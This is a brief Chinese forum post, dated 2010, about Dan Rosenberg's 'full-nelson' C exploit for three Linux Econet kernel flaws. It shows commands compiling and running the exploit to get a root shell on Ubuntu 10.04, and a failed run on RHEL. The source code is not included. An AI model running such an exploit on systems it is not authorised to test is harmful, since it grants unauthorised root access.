系统安全高手 Dan Rosenberg 发布了一段C 程序,这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell,以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过:
$ sudo apt-get update
$ sudo apt-get upgrade
$ uname -r
2.6.32-21-server
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffffa0131600
[+] Resolved commit_creds to 0xffffffff8108b820
[+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
#
由于 RHEL/CentOS 默认不支持 Econet 协议,所以测试没有通过:
# yum update
$ uname -r
2.6.18-194.26.1.el5
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file descriptors.
打印话题
寄给朋友
订阅主题
于 2010-12-10 17:02
新的帖子
被删除的帖子
